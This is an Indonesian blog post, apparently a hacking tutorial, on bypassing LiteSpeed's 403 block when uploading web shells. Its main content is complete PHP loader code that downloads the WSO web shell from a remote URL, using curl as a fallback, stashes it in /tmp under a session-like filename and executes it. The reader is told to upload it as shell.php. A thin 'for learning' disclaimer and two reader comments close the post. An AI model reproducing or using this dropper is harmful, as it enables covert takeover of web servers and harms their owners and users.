Halo,
Kali ini saya akan membagikan tutorial tentang cara bypass 403 forbidden pada server Litespeed.
Meskipun server Litespeed terkadang sangat menjengkelkan, kita tidak bisa berbuat apa-apa selain mencari celah untuk mengatasi masalah ini.
Sebelum saya memberikan tutorialnya, perlu dipahami bahwa Litespeed akan memberikan pesan 403 jika kita mengupload shell yang dianggap sebagai malware atau backdoor berdasarkan ukuran shell tersebut.
Kita dapat menguji hal ini dengan mengupload uploader dengan ukuran di bawah kb, seperti uploader saya sendiri yang berukuran 600b.
Oleh karena itu, salah satu solusi untuk mengatasi masalah ini adalah dengan menggunakan TMP shell, salah satu shell bypass untuk Litespeed 403.
Berikut adalah kode untuk TMP shell:
<?php #tmp shell by odiq
$URL = 'https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso.php'; #admin
$TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php';
function M() {
$FGT = @file_get_contents($GLOBALS['URL']);
if(!$FGT) {
echo `curl -k $(echo {$GLOBALS['URL']}) > {$GLOBALS['TMP']}`;
} else {
$HANDLE = fopen($GLOBALS['TMP'], 'w');
fwrite($HANDLE, $FGT);
fclose($HANDLE);
}
echo '<script>window.location="?work";</script>';
}
if(file_exists($TMP)) {
if(filesize($TMP) === 0) {
unlink($TMP);
M();
} else {
include($TMP);
}
} else {
M();
}
?>
Setelah itu, upload file tersebut dengan nama shell.php dan coba apakah berhasil atau tidak.
Link Shell
Info : NEW METHOD BYPASS FORBIDDEN SUDAH DIRILIS silahan klik disini .
Gunakan untuk pembelajaran, admin tidak bertanggung jawab.
Gak Tembus Bg
ReplyDeleteUdh up artikel yang baru bng buat bypass
Delete